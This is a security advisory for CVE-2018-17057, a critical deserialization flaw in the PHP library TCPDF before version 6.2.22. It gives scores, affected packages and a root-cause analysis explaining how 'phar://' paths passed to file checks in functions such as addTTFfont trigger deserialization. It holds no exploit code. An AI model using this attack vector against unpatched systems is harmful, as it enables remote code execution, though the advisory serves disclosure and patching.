CVE-2018-17057: TCPDF vulnerable to attackers triggering deserialization of arbitrary data
9.8
CVSS Score
3.0
Basic Information
CVE ID
GHSA ID
EPSS Score
0.97141%
CWE
Published
10/6/2022
Updated
2/5/2024
KEV Status
No
Technology
PHP
Technical Details
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
---|---|---|---|
tecnickcom/tcpdf | composer | < 6.2.22 | 6.2.22 |
fooman/tcpdf | composer | < 6.2.22 | 6.2.22 |
la-haute-societe/tcpdf | composer | < 6.2.22 | 6.2.22 |
spoonity/tcpdf | composer | < 6.2.22 | 6.2.22 |
Vulnerability Intelligence
Miggo AI
Root Cause Analysis
The vulnerability stems from unsafe usage of file existence checks (file_exists) and file read operations (file_get_contents) on user-controlled paths. The patch in 6.2.22 introduced TCPDF_STATIC::file_exists to block non-http/https protocols, indicating these functions previously lacked proper validation. Functions like addTTFfont (fonts) and _parsejpeg (images) used these vulnerable checks, allowing 'phar://' deserialization. The high confidence comes from explicit protocol restriction logic added in the fix and CVE details linking phar wrappers to the exploit.